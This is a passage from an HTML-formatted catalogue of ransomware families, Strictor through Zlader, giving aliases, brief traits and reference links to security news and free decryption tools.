<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/the-economics-behind-ransomware-prices/">http://blog.trendmicro.com/trendlabs-security-intelligence/the-economics-behind-ransomware-prices/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_strictor"><a class="anchor" href="#_strictor"></a><a class="link" href="#_strictor">Strictor</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2, shows Guy Fawkes mask</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2108. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Strictor.html">http://www.nyxbone.com/malware/Strictor.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_surprise"><a class="anchor" href="#_surprise"></a><a class="link" href="#_surprise">Surprise</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
</div>
<div class="sect2">
<h3 id="_survey"><a class="anchor" href="#_survey"></a><a class="link" href="#_survey">Survey</a></h3>
<div class="paragraph">
<p>Ransomware Still in development, shows FileIce survey</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2109. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/">http://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_synolocker"><a class="anchor" href="#_synolocker"></a><a class="link" href="#_synolocker">SynoLocker</a></h3>
<div class="paragraph">
<p>Ransomware Exploited Synology NAS firmware directly over WAN</p>
</div>
</div>
<div class="sect2">
<h3 id="_szflocker"><a class="anchor" href="#_szflocker"></a><a class="link" href="#_szflocker">SZFLocker</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2110. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/">http://now.avg.com/dont-pay-the-ransom-avg-releases-six-free-decryption-tools-to-retrieve-your-files/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teamxrat"><a class="anchor" href="#_teamxrat"></a><a class="link" href="#_teamxrat">TeamXrat</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2111. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/">https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teslacrypt_0_x_2_2_0"><a class="anchor" href="#_teslacrypt_0_x_2_2_0"></a><a class="link" href="#_teslacrypt_0_x_2_2_0">TeslaCrypt 0.x - 2.2.0</a></h3>
<div class="paragraph">
<p>Ransomware Factorization</p>
</div>
<div class="paragraph">
<p>TeslaCrypt 0.x - 2.2.0 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>AlphaCrypt</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2112. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/">http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.talosintel.com/teslacrypt_tool/">http://www.talosintel.com/teslacrypt_tool/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teslacrypt_3_0"><a class="anchor" href="#_teslacrypt_3_0"></a><a class="link" href="#_teslacrypt_3_0">TeslaCrypt 3.0+</a></h3>
<div class="paragraph">
<p>Ransomware 4.0+ has no extension</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2113. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/">http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/">http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/">https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teslacrypt_4_1a"><a class="anchor" href="#_teslacrypt_4_1a"></a><a class="link" href="#_teslacrypt_4_1a">TeslaCrypt 4.1A</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2114. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/">http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/">http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/">https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain">https://www.endgame.com/blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack-chain</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_teslacrypt_4_2"><a class="anchor" href="#_teslacrypt_4_2"></a><a class="link" href="#_teslacrypt_4_2">TeslaCrypt 4.2</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2115. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/">http://www.bleepingcomputer.com/forums/t/576600/tesladecoder-released-to-decrypt-exx-ezz-ecc-files-encrypted-by-teslacrypt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/">http://www.welivesecurity.com/2016/05/18/eset-releases-decryptor-recent-variants-teslacrypt-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/">https://blog.kaspersky.com/raknidecryptor-vs-teslacrypt/12169/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/teslacrypt-4-2-released-with-quite-a-few-modifications/">http://www.bleepingcomputer.com/news/security/teslacrypt-4-2-released-with-quite-a-few-modifications/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_threat_finder"><a class="anchor" href="#_threat_finder"></a><a class="link" href="#_threat_finder">Threat Finder</a></h3>
<div class="paragraph">
<p>Ransomware Files cannot be decrypted Has a GUI</p>
</div>
</div>
<div class="sect2">
<h3 id="_torrentlocker"><a class="anchor" href="#_torrentlocker"></a><a class="link" href="#_torrentlocker">TorrentLocker</a></h3>
<div class="paragraph">
<p>Ransomware Newer variants not decryptable. Only first 2 MB are encrypted</p>
</div>
<div class="paragraph">
<p>TorrentLocker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Crypt0L0cker</p>
</li>
<li>
<p>CryptoFortress</p>
</li>
<li>
<p>Teerac</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2116. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/">http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/804008236600934403">https://twitter.com/PolarToffee/status/804008236600934403</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html">http://blog.talosintelligence.com/2017/03/crypt0l0cker-torrentlocker-old-dog-new.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_towerweb"><a class="anchor" href="#_towerweb"></a><a class="link" href="#_towerweb">TowerWeb</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2117. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/618055/towerweb-ransomware-help-support-topic-payment-instructionsjpg/">http://www.bleepingcomputer.com/forums/t/618055/towerweb-ransomware-help-support-topic-payment-instructionsjpg/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_toxcrypt"><a class="anchor" href="#_toxcrypt"></a><a class="link" href="#_toxcrypt">Toxcrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
</div>
<div class="sect2">
<h3 id="_trojan"><a class="anchor" href="#_trojan"></a><a class="link" href="#_trojan">Trojan</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Trojan is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BrainCrypt</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2118. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://download.bleepingcomputer.com/demonslay335/BrainCryptDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/BrainCryptDecrypter.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/PolarToffee/status/811249250285842432">https://twitter.com/PolarToffee/status/811249250285842432</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_troldesh_orshade_xtbl"><a class="anchor" href="#_troldesh_orshade_xtbl"></a><a class="link" href="#_troldesh_orshade_xtbl">Troldesh orShade, XTBL</a></h3>
<div class="paragraph">
<p>Ransomware May download additional malware after encryption</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2119. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.nomoreransom.org/uploads/ShadeDecryptor_how-to_guide.pdf">https://www.nomoreransom.org/uploads/ShadeDecryptor_how-to_guide.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Troldesh.html">http://www.nyxbone.com/malware/Troldesh.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/kelihos-botnet-delivering-shade-troldesh-ransomware-with-no-more-ransom-extension/">https://www.bleepingcomputer.com/news/security/kelihos-botnet-delivering-shade-troldesh-ransomware-with-no-more-ransom-extension/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_truecrypter"><a class="anchor" href="#_truecrypter"></a><a class="link" href="#_truecrypter">TrueCrypter</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2120. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/news/security/truecrypter-ransomware-accepts-payment-in-bitcoins-or-amazon-gift-card/">http://www.bleepingcomputer.com/news/security/truecrypter-ransomware-accepts-payment-in-bitcoins-or-amazon-gift-card/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turkish"><a class="anchor" href="#_turkish"></a><a class="link" href="#_turkish">Turkish</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2121. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/821991600637313024">https://twitter.com/struppigel/status/821991600637313024</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turkish_ransom"><a class="anchor" href="#_turkish_ransom"></a><a class="link" href="#_turkish_ransom">Turkish Ransom</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2122. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/turkishRansom.html">http://www.nyxbone.com/malware/turkishRansom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_umbrecrypt"><a class="anchor" href="#_umbrecrypt"></a><a class="link" href="#_umbrecrypt">UmbreCrypt</a></h3>
<div class="paragraph">
<p>Ransomware CrypBoss Family</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2123. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.thewindowsclub.com/emsisoft-decrypter-hydracrypt-umbrecrypt-ransomware">http://www.thewindowsclub.com/emsisoft-decrypter-hydracrypt-umbrecrypt-ransomware</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unblockupc"><a class="anchor" href="#_unblockupc"></a><a class="link" href="#_unblockupc">UnblockUPC</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2124. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/forums/t/627582/unblockupc-ransomware-help-support-topic-files-encryptedtxt/">https://www.bleepingcomputer.com/forums/t/627582/unblockupc-ransomware-help-support-topic-files-encryptedtxt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ungluk"><a class="anchor" href="#_ungluk"></a><a class="link" href="#_ungluk">Ungluk</a></h3>
<div class="paragraph">
<p>Ransomware Ransom note instructs to use Bitmessage to get in contact with attacker - Secretishere.key - SECRETISHIDINGHEREINSIDE.KEY - secret.key</p>
</div>
</div>
<div class="sect2">
<h3 id="_unlock92"><a class="anchor" href="#_unlock92"></a><a class="link" href="#_unlock92">Unlock92</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2125. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/839038399944224768">https://twitter.com/malwrhunterteam/status/839038399944224768</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vapelauncher"><a class="anchor" href="#_vapelauncher"></a><a class="link" href="#_vapelauncher">VapeLauncher</a></h3>
<div class="paragraph">
<p>Ransomware CryptoWire variant</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2126. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/839771195830648833">https://twitter.com/struppigel/status/839771195830648833</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vaultcrypt"><a class="anchor" href="#_vaultcrypt"></a><a class="link" href="#_vaultcrypt">VaultCrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>VaultCrypt is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CrypVault</p>
</li>
<li>
<p>Zlader</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2127. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/russianRansom.html">http://www.nyxbone.com/malware/russianRansom.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vbransom_7"><a class="anchor" href="#_vbransom_7"></a><a class="link" href="#_vbransom_7">VBRANSOM 7</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2128. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/BleepinComputer/status/817851339078336513">https://twitter.com/BleepinComputer/status/817851339078336513</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_venuslocker"><a class="anchor" href="#_venuslocker"></a><a class="link" href="#_venuslocker">VenusLocker</a></h3>
<div class="paragraph">
<p>Ransomware Based on EDA2</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2129. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/08/venus-locker-another-net-ransomware/?utm_source=twitter&amp;utm_medium=social">https://blog.malwarebytes.com/threat-analysis/2016/08/venus-locker-another-net-ransomware/?utm_source=twitter&amp;utm_medium=social</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/venusLocker.html">http://www.nyxbone.com/malware/venusLocker.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_virlock"><a class="anchor" href="#_virlock"></a><a class="link" href="#_virlock">Virlock</a></h3>
<div class="paragraph">
<p>Ransomware Polymorphism / Self-replication</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2130. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/Virlock.html">http://www.nyxbone.com/malware/Virlock.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/">http://www.welivesecurity.com/2014/12/22/win32virlock-first-self-reproducing-ransomware-also-shape-shifter/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_virus_encoder"><a class="anchor" href="#_virus_encoder"></a><a class="link" href="#_virus_encoder">Virus-Encoder</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Virus-Encoder is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CrySiS</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2131. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/11/24/new-decryption-tool-crysis-ransomware/">http://www.welivesecurity.com/2016/11/24/new-decryption-tool-crysis-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip">http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nyxbone.com/malware/virus-encoder.html">http://www.nyxbone.com/malware/virus-encoder.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/crysis-targeting-businesses-in-australia-new-zealand-via-brute-forced-rdps/">http://blog.trendmicro.com/trendlabs-security-intelligence/crysis-targeting-businesses-in-australia-new-zealand-via-brute-forced-rdps/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wildfire_locker"><a class="anchor" href="#_wildfire_locker"></a><a class="link" href="#_wildfire_locker">WildFire Locker</a></h3>
<div class="paragraph">
<p>Ransomware Zyklon variant</p>
</div>
<div class="paragraph">
<p>WildFire Locker is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hades Locker</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2132. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/">https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xorist"><a class="anchor" href="#_xorist"></a><a class="link" href="#_xorist">Xorist</a></h3>
<div class="paragraph">
<p>Ransomware encrypted files will still have the original non-encrypted header of 0x33 bytes length</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2133. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://support.kaspersky.com/viruses/disinfection/2911">https://support.kaspersky.com/viruses/disinfection/2911</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/xorist">https://decrypter.emsisoft.com/xorist</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xrtn"><a class="anchor" href="#_xrtn"></a><a class="link" href="#_xrtn">XRTN</a></h3>
<div class="paragraph">
<p>Ransomware VaultCrypt family</p>
</div>
</div>
<div class="sect2">
<h3 id="_you_have_been_hacked"><a class="anchor" href="#_you_have_been_hacked"></a><a class="link" href="#_you_have_been_hacked">You Have Been Hacked!!!</a></h3>
<div class="paragraph">
<p>Ransomware Attempt to steal passwords</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2134. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/malwrhunterteam/status/808280549802418181">https://twitter.com/malwrhunterteam/status/808280549802418181</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zcrypt"><a class="anchor" href="#_zcrypt"></a><a class="link" href="#_zcrypt">Zcrypt</a></h3>
<div class="paragraph">
<p>Ransomware</p>
</div>
<div class="paragraph">
<p>Zcrypt is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zcryptor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2135. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/">https://blogs.technet.microsoft.com/mmpc/2016/05/26/link-lnk-to-ransom/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zimbra"><a class="anchor" href="#_zimbra"></a><a class="link" href="#_zimbra">Zimbra</a></h3>
<div class="paragraph">
<p>Ransomware <a href="mailto:mpritsken@priest.com">mpritsken@priest.com</a></p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2136. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.bleepingcomputer.com/forums/t/617874/zimbra-ransomware-written-in-python-help-and-support-topic-crypto-howtotxt/">http://www.bleepingcomputer.com/forums/t/617874/zimbra-ransomware-written-in-python-help-and-support-topic-crypto-howtotxt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zlader"><a class="anchor" href="#_zlader"></a><a class="link" href="#_zlader">Zlader</a></h3>
<div class="paragraph">
<p>Ransomware VaultCrypt family</p>
</div>
<div class="paragraph">
<p>Zlader is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Russian</p>
</li>
<li>
<p>VaultCrypt</p>
</li>
<li>
<p>CrypVault</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2137. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
